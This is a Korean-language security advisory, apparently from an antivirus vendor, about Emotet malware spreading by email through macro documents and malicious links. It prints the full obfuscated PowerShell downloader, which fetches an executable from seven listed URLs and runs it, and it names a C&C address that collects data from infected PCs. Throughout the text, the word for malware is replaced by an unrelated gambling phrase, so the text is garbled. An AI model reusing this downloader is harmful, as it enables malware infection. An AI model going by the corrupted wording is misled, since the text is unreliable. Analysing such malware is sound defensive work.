이메일 첨부파일로 국내외 대량 유포 중인 이모텟(Emotet) 가상 바카라 주의
최근 이모텟 가상 바카라가 국내 외로 유포되고 있어 이용자들의 주의 부탁드립니다.
공격자는 불특정 다수를 대상으로 이메일, 메시지를 통하여 이모텟 가상 바카라를 유포중입니다. 실제 악성 행위 수행하는 파일 유포 방법은 스크립트가 삽입된 악성 문서 파일을 첨부하거나 특정 URL로 클릭을 유도하여 최종 페이로드 다운로드를 유도합니다.
[그림 1] 첨부파일이 포함된 이모텟 유포 가상 바카라 메일
[그림 2] 링크가 포함된 이모텟 가상 바카라 메일 유형
가상 바카라 문서 파일을 첨부하여 유포된 경우, 아래와 같은 3가지 케이스로 위장하여 유포되며파워셸을 통하여 가상 바카라를 다운로드하는 스크립트가 첨부되어 있습니다.
[그림 3] 가상 바카라 문서 템플릿 1
[그림 4] 가상 바카라 문서 템플릿 2
[그림 5] 가상 바카라 문서 템플릿 3
아래는 문서에 포함된 매크로입니다
[그림 6] 매크로 가상 바카라의 일부
삽입된 파워셸 스크립트와 C&C는 아래와같습니다.
$F74ycr7=('D'+('k'+'hn1')+'2u');&('n'+'ew'+'-item') $Env:teMP\WOrD19\ -itemtype dirEctoRY;[Net.ServicePointManager]::"s`Ecuri`Typro`Tocol" = (('tls'+'1')+('2, '+'t')+('ls11,'+' '+'t')+'ls'); $Rkw7usl = (('D1'+'1on')+'g'+'43');$Ci348_k=('V2'+('nyk8'+'l')); $Urqr5m8=$env:temp+((('T'+'4Zwo')+('rdT4Z'+'2')+('0'+'19')+'T'+'4Z') -cReplACE ([CHar]84+[CHar]52+[CHar]90),[CHar]92)+$Rkw7usl+('.'+('e'+'xe')); $Hltfun9=('X3'+'54'+('92'+'b')); $Ebzr64x=.('new'+'-obj'+'ect') net.WeBCLIEnT; $Cgg8bo4=(('h'+'tt')+'p'+':'+('//'+'ma')+'s'+'qu'+'e'+('.e'+'s')+('/s'+'tat')+('/'+'HW')+'D'+'zR'+('/*h'+'ttp:'+'//me')+'sd'+'el'+('i'+'cesital')+'i'+'en'+('s.'+'f'+'r/wp')+'-a'+('d'+'mi'+'n/f')+('ile/'+'IIc')+('k/*http'+':')+('//'+'lidis'+'c')+'om'+('.'+'com.')+('b'+'r/B')+('KP_'+'Tin'+'aP'+'OS'+'/at'+'tach/')+'Ul'+'i'+('j'+'fEK')+'/'+('*'+'ht')+('tp'+':')+('/'+'/facanh'+'a.'+'co'+'m.br/temp/')+'f'+('ile'+'/')+'V'+'F'+('yi'+'tEUEZ')+('/*ht'+'t'+'ps://'+'at'+'tech.')+('ml/'+'w')+('p-'+'admin')+('/yZDB'+'l'+'Y')+('kJ'+'tq')+'/*'+'ht'+('t'+'p://')+('ad'+'mve'+'r')+'o.'+'co'+'m'+('.b'+'r/mi')+('nh'+'aa')+('gu'+'a'+'/'+'hLwOiX/*'+'htt')+'p'+'s:'+('//d'+'ev')+'.'+('dos'+'il')+'y'+'.'+'i'+('n/w'+'p-c')+'on'+('te'+'n')+'t/'+('a'+'ttach/zdR'+'HVD'+'Cw')+'l'+'/')."SP`lIt"([char]42); $Bn0idni=('X'+('i'+'7ag')+'a5'); foreach($Up90jr9 in $Cgg8bo4){try{$Ebzr64x."Dow`NLoAD`F`ilE"($Up90jr9, $Urqr5m8);$K3c6jw2=(('H'+'b7')+('fg'+'rh')); If ((.('Get'+'-'+'Item') $Urqr5m8)."LEnG`Th" -ge 22028) {.('Invok'+'e'+'-'+'Item')($Urqr5m8); $Hw80cs9=('Fi'+'lr'+('9'+'u8')); break; $Anfyg5p=('F9'+('bsdf'+'p'))}}catch{}}$Ul7o96m=(('D'+'3ao')+('pj'+'o')) |
[표 1] 파워셸 스크립트 가상 바카라
http://masque[.]es/stat/HWDzR/ http://mesdelicesitaliens[.]fr/wp-admin/file/IIck/ http://lidiscom.com[.]br/BKP_TinaPOS/attach/UlijfEK/ http://facanha.com[.]br/temp/file/VFyitEUEZ/ https://attech[.]ml/wp-admin/yZDBlYkJtq/ http://admvero[.]com[.]br/minhaagua/hLwOiX/ https://dev.dosily[.]in/wp-content/attach/zdRHVDCwl/ |
[표 2] 가상 바카라 다운로드 C&C 주소 리스트
위 C&C를 통해 다운로드 되는 페이로드는 ‘%SYSTEMROOT%\system32’, ‘%appdata%’하위로 자가복제합니다. 주 가상 바카라 행위는 C&C인 190.136.179[.]102로 감염PC 정보(컴퓨터 이름, 볼륨 정보, 윈도우 버전, 네트워크 정보, 프로세스 리스트) 전송하며 최종 페이로드 Emotet 가상 바카라 코드 다운로드를 수행합니다.
[그림 7] 자동 실행 레지스트리 등록 화면
[그림 8] 감염PC 정보 전송 화면
따라서,이스트시큐리티 알약(ALYac) 백신 프로그램에서는 국내외에서 발견되는 최신 이모텟 가상 바카라파일 탐지 및 치료 기능을 지속적으로 추가하고 있으므로 항상 최신 버전으로 업데이트를 유지하고, 실시간 감시 기능 등을 활성화하는 것이 좋습니다.
현재 알약에서는 해당 가상 바카라들에 대해Trojan.Downloader.DOC.gen, Trojan.Agent.가상 바카라으로 탐지중에 있습니다.
※ 관련글 보기
▶
▶
▶
▶
▶
▶
▶
▶